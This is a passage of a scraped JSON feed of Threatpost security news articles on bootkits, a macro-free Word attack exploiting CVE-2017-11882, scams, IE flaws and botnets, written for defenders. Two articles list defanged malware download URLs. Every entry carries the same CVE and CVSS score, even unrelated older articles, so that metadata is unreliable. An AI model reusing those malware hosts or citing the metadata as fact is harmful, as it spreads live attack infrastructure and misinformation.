UEFI](<https://threatpost.com/secure-boot-windows-8-worries-researchers-092211/>) instead of the traditional BIOS. UEFI includes some functionality that allows Microsoft to require that any software loaded during the boot sequence of a Windows PC be signed by one of the keys loaded into the firmware. 
Open-source advocates have argued that the technology could allow the company to prevent users from loading alternate operating systems, but Microsoft and [officials from the Linux Foundation](<https://threatpost.com/linux-foundation-says-uefi-doesnt-have-prevent-other-os-installations-110111/>) have said that isn\u2019t necessarily the case.\n\nKleissner said that he notified Microsoft of his work and has given the company the source code of the bootkit and the paper he\u2019s written for a conference presentation.\n\nMicrosoft has not confirmed the details of Kleissner\u2019s claims.\n", "cvss3": {}, "published": "2011-11-17T20:42:19", "type": "threatpost", "title": "New Version of Stoned Bootkit Said to Bypass Windows 8 Secure Boot", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:19", "id": "THREATPOST:4BAED737182ECF19718520A7258DFDAA", "href": "https://threatpost.com/new-version-stoned-bootkit-said-bypass-windows-8-secure-boot-111711/75909/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:45", "description": "Typically, inbox-based attacks that include malicious Microsoft Office attachments require adversaries to trick users into enabling macros. But researchers say they have identified a new malicious email campaign that uses booby-trapped Office attachments that are macro-free.\n\nThe attacks do not generate the same type of default warning from Microsoft associated with macro-based attacks, according to research published Wednesday by [Trustwave\u2019s SpiderLabs](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Multi-Stage-Email-Word-Attack-without-Macros/>). 
When opening attachments, there are no warnings or pop-ups alerting victims, researchers said.\n\nThe attack uses malicious Word attachments that activate a four-stage infection process that ultimately exploits the [Office Equation Editor vulnerability](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) ([CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>)), patched last year by Microsoft. The payload is designed to steal credentials from the victim\u2019s email, FTP and browsers.\n\nResearchers emphasized the layered nature of the attack, comparing it to a turducken, a holiday dish that stuffs a chicken into a duck, and then into a turkey.\n\n\u201cThis \u2018turducken\u2019 attack really exploits CVE-2017-11882 in the end to obtain code execution,\u201d Trustwave researchers told Threatpost in an email response to questions. Systems that have patched for CVE-2017-11882 are not vulnerable.\n\nResearchers at Trustwave said the malware infection chain uses a combination of techniques that start with a .DOCX formatted attachment. The spam originates from the Necurs botnet. Email subject lines fall into four financially related categories: \u201cTNT STATEMENT OF ACCOUNT\u201d, \u201cRequest for Quotation\u201d, \u201cTelex Transfer Notification\u201d and \u201cSWIFT COPY FOR BALANCE PAYMENT\u201d. 
All of the emails examined by SpiderLabs researchers had the attachment named \u201creceipt.docx\u201d.\n\n**The Turducken Attack**\n\nThe four-stage infection process begins when the .DOCX file is opened and triggers an embedded OLE (Object Linking and Embedding) object that contains external references.\n\n\u201cThis \u2018feature\u2019 allows external access to remote OLE objects to be referenced in the document.xml.rels,\u201d the researchers wrote.\n\nAccording to SpiderLabs, attackers are taking advantage of the fact that Word (or .DOCX formatted) documents created using Microsoft Office 2007 use the \u201c[Open XML Format](<https://msdn.microsoft.com/en-us/library/bb448854\\(v=office.12\\).aspx>)\u201d. The format is based on XML and ZIP archive technologies and can easily be manipulated programmatically or manually, said researchers.\n\nStage two includes the .DOCX file triggering the download of an RTF (Rich Text Format) file.\n\n\u201cWhen a user opens the DOCX file, it causes a remote document file to be accessed from the URL: hxxp://gamestoredownload[.]download/WS-word2017pa[.]doc. This is actually an RTF file that is downloaded and executed,\u201d researchers describe.\n\n**Equation Editor Exploited**\n\nIt\u2019s the RTF file that exploits the Office Equation Editor vulnerability (CVE-2017-11882). In November, Microsoft patched the vulnerability. The Microsoft Equation Editor is installed by default with the Office suite. The application is used to insert and edit complex equations as OLE items in Microsoft Word documents.\n\nStage three includes the decoding of text inside the RTF file that in turn triggers an MSHTA command line that downloads and executes an HTML executable (HTA) file. 
Next the HTA contains an obfuscated PowerShell Script which eventually downloads and executes the remote payload \u2013 the Password Stealer Malware.\n\n\u201cThe malware steals credentials from email, ftp, and browser programs by concatenating available strings in the memory and usage of the APIs RegOpenKeyExW and PathFileExistsW to check if registry or paths of various programs exist,\u201d said researchers.\n\nResearchers note the number of stages and vectors used in these attacks is unusual. \u201cAnother noticeable point is that the attack uses file types (DOCX, RTF and HTA), that are not often blocked by email or network gateways unlike the more obvious scripting languages like VBS, JScript or WSF,\u201d researchers noted. \u201cIn the end, be wary of unknown or unexpected Office documents and keep your patches up to date.\u201d\n", "cvss3": {}, "published": "2018-02-15T12:31:26", "type": "threatpost", "title": "Word-based Malware Attack Doesn\u2019t Use Macros", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-02-15T12:31:26", "id": "THREATPOST:B4579714760429B9531FF0E79E44C578", "href": "https://threatpost.com/word-based-malware-attack-doesnt-use-macros/129969/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:47", "description": "Do you find e-mail pleas for help from the widow of Democratic Republic of the Congo strongman Mobutu Sese Seko unconvincing or downright silly? That may be the point, according to Microsoft researcher Cormac Herley.\n\nThe outlandish claims of Nigerian Letter \u2013 or \u201c419\u201d \u2013 scams serve a critical purpose: separating the skeptics from the suckers. 
That\u2019s the conclusion of a new [paper published by Microsoft Research](<http://research.microsoft.com/apps/pubs/default.aspx?id=167712>) and scheduled to be presented on June 25th at the Workshop on the Economics of Information Security (WEIS) 2012 Conference in Berlin, Germany.\n\nThe paper, \u201c[Why do Nigerian Scammers Say They are from Nigeria?](<http://research.microsoft.com/pubs/167712/WhyFromNigeria.pdf>)\u201d (PDF) by researcher Cormac Herley analyzes the methods that online scammers use to navigate around a common problem in any detection program: false positives.\n\nIn the context of online scams, a \u201cfalse positive\u201d is any individual who is attacked, but yields nothing to the attacker.\n\nAs the density of potential victims decreases, Herley observes, the share of them that can be profitably attacked plummets. That leaves scammers in a Catch-22: only by targeting large numbers of potential victims can scammers find enough viable targets to make a profit. But the incremental cost of running 419 scams makes it unprofitable to target a large number of potential victims. That is, unless the attackers have an easy (and cheap) way to distinguish between the suckers and the non-suckers.\n\nAnd that\u2019s where \u201cNigeria\u201d comes in. Basing the attack on an absolutely absurd and unbelievable premise (i.e. far-fetched stories of West African riches) is, according to Herley, an advantage to the attacker.\n\n\u201cBy sending an email that repels all but the most gullible the scammer gets the most promising marks to self-select, and tilts the true to false positive ratio in his favor.\u201d\n\nHerley is the principal researcher at Microsoft\u2019s machine learning department. The work on Nigerian scams isn\u2019t his first try at parsing the economics of fraud. 
His past research has debunked industry claims about [the size of the underground economy](<https://threatpost.com/cormac-herley-underground-economy-irc-economics-and-externalities-cybercrime-061209/>) and the [utility of cybercrime surveys](<https://threatpost.com/microsoft-research-cybercrime-surveys-are-useless-062111/>), among other topics. You can read more on the WEIS 2012 conference Web site [here](<http://weis2012.econinfosec.org/program.html>). \n", "cvss3": {}, "published": "2012-06-21T12:40:09", "type": "threatpost", "title": "It's The Stupidity, Stupid: How Absurd Pitches Help Online Scammers Find Their Marks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:29", "id": "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "href": "https://threatpost.com/its-stupidity-stupid-microsoft-says-absurd-pitches-help-online-scammers-find-their-marks-06211/76718/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "Microsoft warned Monday this year\u2019s crop of tax scams are using social engineering attacks based on fear to spread Zdowbot and Omaneat banking Trojans and collect personal info via spoofed tax sites linked to from phishing campaigns.\n\nThe warning comes with less than a month before the April 18 tax deadline and adds to an already busy tax season of scams reported by various security experts and the U.S. Internal Revenue Service.\n\n\u201cThese attacks circulate year-round as cybercriminals take advantage of the different country and region tax schedules, but they peak in the months leading to U.S. 
Tax Day in mid-April,\u201d warned Microsoft on its [Malware Protection Center blog](<https://blogs.technet.microsoft.com/mmpc/2017/03/20/tax-themed-phishing-and-malware-attacks-proliferate-during-the-tax-filing-season/>).\n\nEmail ploys reported by Microsoft include messages with the subject lines \u201cYou are eligible!\u201d and \u201cConfirmation of your tax refund\u201d and \u201cSubpoena from IRS\u201d. Microsoft says scammers are also targeting certified public accountants with the email subject line \u201cI need a CPA\u201d.\n\nIn one tax-based scam example, Microsoft found a malicious Word document contained in an email that warns recipients they face pending tax-related law enforcement action. A malicious Word document, identified as a subpoena, accompanies the email. If the file attachment is opened, the Word document displays in Protected View mode and prompts the target of the attack to enable editing.\n\n\u201cIf Enable Editing is clicked, malicious macros in the document download a malware detected as TrojanDownloader:Win32/Zdowbot.C,\u201d Microsoft said. Next, attackers attempt to install malware that is part of the Zdowbot family of Trojan downloaders.\n\nAnother scam targets CPA tax preparation experts in hopes of infecting PCs filled with third-party tax data with the Omaneat family of info-stealing malware. Email with the subject line \u201cI need a CPA\u201d contains the fraudulent plea: \u201cI need a careful and experienced high quality accountant, to handle all matters of accounting including tax preparation..\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225813/Tax-social-engineering-email-malware-1.png>)\n\nThe email includes an attachment called \u201ctax-infor.doc\u201d that contains malicious macro code. If a recipient ignores Microsoft\u2019s warning message regarding not enabling content, the malicious macro downloads the malware TrojanSpy:MSIL/Omaneat from hxxp://193[.]150[.]13[.]140/1.exe. 
\u201cThese threats can log keystrokes, monitor the applications you open, and track your web browsing history,\u201d according to Microsoft.\n\nTax scammers are also luring victims with threats. One email reads \u201cInfo on your debt and overdue payments\u201d in the subject line. Emails don\u2019t include attachments, rather they include warnings from the sender that purports to be from the IRS and its Realty Tax Department. The email prompts recipients to visit a website that contains a personalized report on their delinquent realty taxes. The message warns action is needed within 24 hours to avoid \u201csignificant charges and fines.\u201d The link is to a phishing page.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06225809/Tax-social-engineering-email-malware-7.png>)\n\n\u201cAs the examples show, phishing and malware attacks target both professional and individual taxpayers,\u201d Microsoft said. It cited media reports of a recent government contractor that fell victim to a spear phishing scam, resulting in the exposure of current and former employees\u2019 sensitive tax information.\n\n\u201cThese attacks rely on social engineering tactics \u2014 you can detect them if you know what to look for. Be aware, be savvy, and be cautious in opening suspicious emails. 
Even if the emails came from someone you know, be wary about opening the attachment or clicking on links,\u201d Microsoft said.\n", "cvss3": {}, "published": "2017-03-21T11:54:32", "type": "threatpost", "title": "Latest Tax Scams Include Phishing Lures, Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-25T16:42:36", "id": "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "href": "https://threatpost.com/latest-tax-scams-include-phishing-lures-malware/124431/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:42", "description": "Microsoft has released an open-source Web Protection Library (WPL) to help developers protect web sites from cross-site scripting attacks.\n\nThe WPL, which is a set of .NET assemblies, is being offered as part of a defense in depth strategy to add an extra layer to any validation or secure coding practices.\n\nIt essentially provides a list of encoding functions for user input, including HTML, HTML attributes, XML, CSS and JavaScript.\n\n * **White Lists:** AntiXSS differs from the standard .NET framework encoding by using a white list approach. All characters not on the white list will be encoded using the correct rules for the encoding type. Whilst this comes at a performance cost, AntiXSS has been written with performance in mind.\n * **Secure Globalization:** The web is a global market place, and cross-site scripting is a global issue. An attack can be coded anywhere, and Anti-XSS now protects against XSS attacks coded in dozens of languages.\n * **Security Runtime Engine:** The Security Runtime Engine (SRE) provides a wrapper around your existing web sites, ensuring that common attack vectors do not make it to your application. 
Protection is provided as standard for Cross Site Scripting and SQL Injection.\n\nDocumentation and download instructions [can be found at the open-source Codeplex](<http://wpl.codeplex.com/releases/view/20333>) site.\n", "cvss3": {}, "published": "2010-06-02T16:37:20", "type": "threatpost", "title": "Microsoft Releases Anti-XSS Web Protection Library", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:52", "id": "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "href": "https://threatpost.com/microsoft-releases-anti-xss-web-protection-library-060210/74047/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "There is a newly discovered vulnerability in both Internet Explorer 6 and Internet Explorer 7 that could enable an attacker to take complete control of a vulnerable machine.\n\nThe vulnerability is the result of a dangling pointer in IE and there is a working exploit for the flaw circulating online. The flaw lies in the way that Internet Explorer handles CSS data. [CSS](<http://www.w3.org/Style/CSS/>) is a technology that\u2019s used in many sites to help present information in an organized manner. Specifically, the vulnerability is in mshtml.dll, the Microsoft HTML Viewer.\n\nAccording to an [analysis by Vupen Security](<http://www.vupen.com/english/advisories/2009/3301>), an attacker could exploit the flaw either to crash a vulnerable version of IE, or to run arbitrary code on the user\u2019s machine. There is no patch available for the vulnerability. The SANS Internet Storm Center also has an analysis up.\n\nA vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. 
This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the \u201cgetElementsByTagName()\u201d method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.\n\nAn [exploit for the vulnerability in IE](<http://www.securityfocus.com/archive/1/507984/30/0/threaded>) was published on the Bugtraq mailing list Friday, but experts say it is not very reliable at this point. However, the level of detail included in the Bugtraq post will likely lead to the release of a more reliable exploit soon. Until a patch is available, users should disable JavaScript in IE to prevent exploitation.\n\nMicrosoft has not yet published any advisories on the new IE vulnerability.\n", "cvss3": {}, "published": "2009-11-22T21:47:10", "type": "threatpost", "title": "New Zero-Day Flaw Discovered in IE7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:05:16", "id": "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "href": "https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/73151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:05:59", "description": "Dennis Fisher talks with Microsoft\u2019s Katie Moussouris about the way that the Trustworthy Computing effort at Microsoft has changed, how the security community has evolved since she got involved in the 1990s and the challenges\u2013and fun\u2013of being a woman in security.\n\n*Podcast audio courtesy of [sykboy65](<http://www.youtube.com/watch?v=Z8fMm3sm_ww&feature=channel_page>)\n\nSubscribe to the Digital Underground podcast on [iTunes](<http://itunes.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=315355232>)\n", "cvss3": {}, 
"published": "2011-03-16T15:12:29", "type": "threatpost", "title": "Katie Moussouris on Microsoft, Trustworthy Computing and the Evolution of the Security Community", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-07-24T18:59:56", "id": "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", "href": "https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/75032/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:58", "description": "[](<https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/>)Windows 8 isn\u2019t yet a week old, but the scammers and phishing crews already are taking their swings at it, setting up new campaigns based on the shiny new operating system. Security researchers have identified a new scareware campaign playing off of the Windows 8 launch, as well as a phishing email trying the same tack.\n\nThe public release of Windows 8 was just last Friday, Oct. 26, and most people probably haven\u2019t even seen the OS in person yet. But that\u2019s not stopping the scammers from trying to make a buck off the back of Microsoft\u2019s work. This shouldn\u2019t come as a surprising development, given that these crews use virtually every major news event, natural disaster and celebrity scandal as a money-making opportunity. \n\nThis time, the Windows 8 launch has inspired a new strain of scareware\u2013surely not the last\u2013that purports to be the \u201cWin 8 Security System\u201d and, of course, warns victims about a series of non-existent threats on their PCs. 
The scareware shows users a warning, telling them that their machines are infected and informing them that they should register their copy of the scareware in order to see what the threats are and remove them, according to an [analysis from Trend Micro](<http://blog.trendmicro.com/trendlabs-security-intelligence/theyre-here-threats-leveraging-windows-8/>).\n\nUsers often will come across these fake antivirus or scareware threats on either compromised legitimate Web sites or malicious sites. Scammers will try to compromise popular legitimate sites, such as news sites, social media sites and others and insert some malicious code onto the sites. When users visit a compromised site, they may see a pop-up window telling them that their machine is infected. Usually, clicking on any link in the pop-up will download the scareware, which could then require a payment of $50 or $100 in order to remove it.\n\nScammers rely on users searching for popular terms, such as Windows 8, in order to land on the malicious sites they control, so they tie their campaigns to trending terms. The researchers at Trend Micro also came across a phishing campaign that\u2019s tied to Windows 8, trying to goad users into downloading a free copy of the new OS. Rather than a free version of Windows 8, the victim gets a request for their personal data, including name, email and other details. 
\n\nTo be clear, the only way you\u2019re getting Windows 8 for free is when you buy a new PC or tablet.\n", "cvss3": {}, "published": "2012-11-01T15:32:54", "type": "threatpost", "title": "Scareware and Phishing Scams Play on Windows 8 Launch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:18", "id": "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "href": "https://threatpost.com/scareware-and-phishing-scams-play-windows-8-launch-110112/77176/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:39", "description": "Microsoft\u2019s September batch of security updates will include fixes for multiple \u201ccritical\u201d vulnerabilities affecting the Windows operating system.[](<https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/>)\n\nIn all, the software maker [will release five bulletins](<http://www.microsoft.com/technet/security/bulletin/ms09-sep.mspx>) with patches for a range of flaws that could expose users to remote code execution attacks.\n\nThe flaws affect all supported versions of Windows, including Windows Vista and Windows Server 2008.\n\nMicrosoft describes a \u201ccritical\u201d vulnerability as one whose exploitation could allow the propagation of an Internet worm without user action, so it\u2019s important that Windows users treat next Tuesday\u2019s updates with the highest priority.\n\nIt is not yet clear if this month\u2019s patches will cover the FTP in IIS vulnerability that was disclosed with exploit code earlier this week.\n", "cvss3": {}, "published": "2009-09-08T11:59:04", "type": "threatpost", "title": "Five Critical Bulletins Coming on MS Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:49", "id": "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "href": 
"https://threatpost.com/five-critical-bulletins-coming-ms-patch-tuesday-090809/72234/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "[](<https://threatpost.com/microsoft-settles-kelihos-botnet-defendant-says-he-didnt-run-network-101912/>)Microsoft on Friday said it has reached a settlement with a Russian programmer it named as a defendant in a lawsuit related to the operation of the notorious [Kelihos botnet](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>). The company said that it no longer believes Andrey N. Sabelnikov was the operator of the botnet, but was instead responsible for writing some code that was later used by the botnet.\n\nThis is a departure from the company\u2019s earlier statements, which painted Sabelnikov as someone \u201cresponsible for the operations of the Kelihos botnet.\u201d After working with researchers at Kaspersky Lab and other organizations to take down the Kelihos botnet in the autumn of 2011, Microsoft amended its original complaint to include Sabelnikov as a defendant. The company alleged in a complaint filed in U.S. District Court in January that not only did Sabelnikov [write some of the Kelihos code](<https://threatpost.com/microsoft-adds-kelihos-botnet-operator-civil-complaint-012412/>), but he helped run the botnet.\n\n\u201cIn today\u2019s complaint, Microsoft presented evidence to the court that Mr. Sabelnikov wrote the code for and either created, or participated in creating, the Kelihos malware. Further, the complaint alleges that he used the malware to control, operate, maintain and grow the Kelihos botnet. These allegations are based on evidence Microsoft investigators uncovered while analyzing the Kelihos malware. Microsoft also alleges that Mr. Sabelnikov registered more than 3,700 \u2018cz.cc\u2019 subdomains from Mr. 
Piatti and dotFREE Group SRO, and misused those subdomains to operate and control the Kelihos botnet,\u201d Richard Boscovich, a senior staff attorney in the Microsoft Digital Crimes Unit, wrote in a [blog post at the time](<https://blogs.technet.com/b/microsoft_blog/archive/2012/01/23/microsoft-names-new-defendant-in-kelihos-case.aspx?Redirected=true>). \n\nNow, Microsoft is taking a somewhat different tack. Rather than accusing Sabelnikov of running the Kelihos botnet, the company [released a statement](<https://blogs.technet.com/b/microsoft_blog/archive/2012/10/19/microsoft-reaches-settlement-with-second-kelihos-defendant.aspx?Redirected=true>) saying that he merely wrote some of the malware\u2019s code. As a result, the company and the programmer reached an undisclosed out-of-court settlement.\n\n\u201cMicrosoft and St. Petersburg software programmer Andrey Sabelnikov have entered into a Settlement Agreement in the matter of Microsoft v. Sabelnikov. During the negotiations, after reviewing the evidence provided by Microsoft and engaging in discussions, the parties have come to an understanding that Mr. Sabelnikov wrote code that was used in the Kelihos botnet code, but the programmer is not the operator of the botnet or involved in its activities. After a review and understanding of all of the details of the case, the parties were able to enter into a confidential settlement agreement in this matter, which resolves the dispute between the parties,\u201d Boscovich wrote on Friday.\n\nMicrosoft has been quite aggressive in its efforts to disrupt and take down botnets in the last couple of years, using both technical and legal tactics to knock the networks offline. The company has gone after several different botnets, with varying degrees of fervor and success, but the Kelihos operation was the first time that Microsoft had named any individuals as defendants in its legal complaints. 
Until then it had focused on hosting providers or other corporate entities allegedly involved in botnet operations.\n", "cvss3": {}, "published": "2012-10-19T19:01:33", "type": "threatpost", "title": "Microsoft Settles With Kelihos Botnet Defendant, Says He Didn't Run the Network", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:21", "id": "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "href": "https://threatpost.com/microsoft-settles-kelihos-botnet-defendant-says-he-didnt-run-network-101912/77135/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:24", "description": "[](<https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/>)Microsoft\u2019s security response team is investigating reports of a potentially dangerous code execution vulnerability in its flagship Internet Explorer browser.\n\nThe company warned that an attacker could host a maliciously crafted web page and run arbitrary code if they could convince a user to visit the web page and then get them to press the F1 key in response to a pop up dialog box.\n\nMicrosoft\u2019s Jerry Bryant said the company is not aware of any attacks related to this vulnerability.\n\n\u201cWe have determined that users running Windows 7, Windows Server 2008 R2, Windows Server 2008, and Windows Vista, are not affected by this issue,\u201d Bryant said.\n\nFrom [the MSRC blog](<http://blogs.technet.com/msrc/archive/2010/02/28/investigating-a-new-win32hlp-and-internet-explorer-issue.aspx>): \n\nThe issue in question involves the use of VBScript and Windows Help files in Internet Explorer. Windows Help files are included in a long list of what we refer to as \u201cunsafe file types\u201d. These are file types that are designed to invoke automatic actions during normal use of the files. 
While they can be very valuable productivity tools, they can also be used by attackers to try and compromise a system. \n\nAlthough this issue has been publicly documented, Microsoft has not yet provided pre-patch mitigation guidance or workarounds for affected customers.\n", "cvss3": {}, "published": "2010-03-01T14:26:26", "type": "threatpost", "title": "Microsoft Warns of New IE Code Execution Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:22:38", "id": "THREATPOST:370DCA5103923FA8965F6D8890D4198F", "href": "https://threatpost.com/microsoft-warns-new-ie-code-execution-flaw-030110/73602/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:56", "description": "Microsoft is planning to disable support for the weak SSLv3 protocol in Internet Explorer at some undetermined point in the future, and also will remove support for it in the company\u2019s online services soon.\n\nThe security and utility of SSLv3 has been an issue for a long time, but it came into sharper focus earlier this month when researchers at Google released details of a [new attack known as POODLE](<http://threatpost.com/new-poodle-ssl-3-0-attack-exploits-protocol-fallback-issue/108844>) that enables an attacker to decrypt protected content under certain circumstances. If an attacker has control of a target\u2019s Internet connection and can force the victim to run some Javascript in her browser, then he can eventually decrypt the content of a session protected by SSLv3. 
To do so, the attacker needs to be able to force a connection using the outdated protocol, and that can be done by forcing a failed secure connection between a server and client, which will trigger the server to try and renegotiate the secure connection using a different protocol.\n\nSSLv3 is nearly 15 years old and experts have considered it to be a security risk for a long time and have recommended that site operators use newer alternatives such as TLS 1.2. But there are plenty of sites that still support SSLv3 and IE 6, an artifact of a browser, doesn\u2019t support any transport layer security protocols newer than SSLv3 by default. Microsoft officials said the company is planning to remove the ability for IE to fall back to SSLv3 and eventually will disable the protocol by default altogether.\n\n\u201cWe are committed to helping protect our customers and providing the best possible encryption to protect their data. To do this, we\u2019re working to disable fallback to SSL 3.0 in IE, and disable SSL 3.0 by default in IE, and across Microsoft online services, over the coming months,\u201d Tracey Pretorius of the MSRC said in a blog [post](<http://blogs.technet.com/b/msrc/archive/2014/10/29/security-advisory-3009008-released.aspx>).\n\n\u201cMillions of people and thousands of organizations around the world rely on our products and services every day, and while the number of systems that rely on SSL 3.0 exclusively is very small, we recognize that, particularly for enterprises, disabling the protocol may cause some impact. 
That\u2019s why we\u2019re taking a planned approach to this issue and providing customers with advance notice.\u201d\n\nMicrosoft also is providing a FixIt tool that allows users to disable SSLv3 support in any supported version of IE.\n", "cvss3": {}, "published": "2014-10-29T14:56:06", "type": "threatpost", "title": "Microsoft Plans to Disable SSLv3 in IE, All Online Services", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-05T15:10:14", "id": "THREATPOST:05A74488EF15AE2BEA20C34AC753FB10", "href": "https://threatpost.com/microsoft-plans-to-disable-sslv3-in-ie-all-online-services/109087/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:25", "description": "The Hungarian research facility that helped discover Duqu, the [much-blogged about](<https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/>) Trojan, has now released an open-source toolkit that can be used to help detect traces and instances of the worm.\n\nThe Laboratory of Cryptography and System Security (CrySys) at the Budapest University of Technology and Economics developed the [Duqu Detector Toolkit v1.01](<http://www.crysys.hu/duqudetector.html>) to be used on computers and networks where the malware may have already been removed from the system. Duqu \u2013 a cousin of the Stuxnet worm that infected uranium enrichment facilities in Iran \u2013 famously had a hard-coded 36 day lifespan. But systems may still retain certain Duqu files even after the virus has deactivated itself. By focusing on what they refer to as \u201csuspicious files,\u201d the toolkit can \u201cdetect new, modified versions of the Duqu threat,\u201d CrySys said. 
\n\nLike other toolkits, CrySys says the tool could still generate false positives and therefore encourages having a professional look over the log files of each test.\n\nAs Threatpost [previously reported](<https://threatpost.com/duqu-installer-contains-windows-kernel-zero-day-110111/>), users can be infected with Duqu after opening a particular Word document that exploits a flaw in Windows\u2019 Win32k TrueType font parsing engine and leads to remote code execution. Microsoft has maintained it is working on a patch for the bug but in the meantime [released a workaround](<https://threatpost.com/microsoft-releases-workaround-kernel-flaw-used-duqu-110411/>) for the kernel flaw late last week.\n", "cvss3": {}, "published": "2011-11-10T16:17:49", "type": "threatpost", "title": "New Toolkit Able to Track and Trace Duqu Worm", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:22", "id": "THREATPOST:30DA1C9D6157103537A72208FA5F0B5D", "href": "https://threatpost.com/new-toolkit-able-track-and-trace-duqu-worm-111011/75879/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2019-09-11T10:31:23", "description": "\n\n## Quarterly highlights\n\n### Spam through Google services\n\nIn the second quarter of 2019, scammers were making active [use of cloud-based data storage services](<https://www.kaspersky.com/blog/spam-through-google-services/27228/>) such as Google Drive and Google Storage to hide their illegal content. The reasoning behind this is simple: a link from a legitimate domain is seen as more trustworthy by both users and spam filters. 
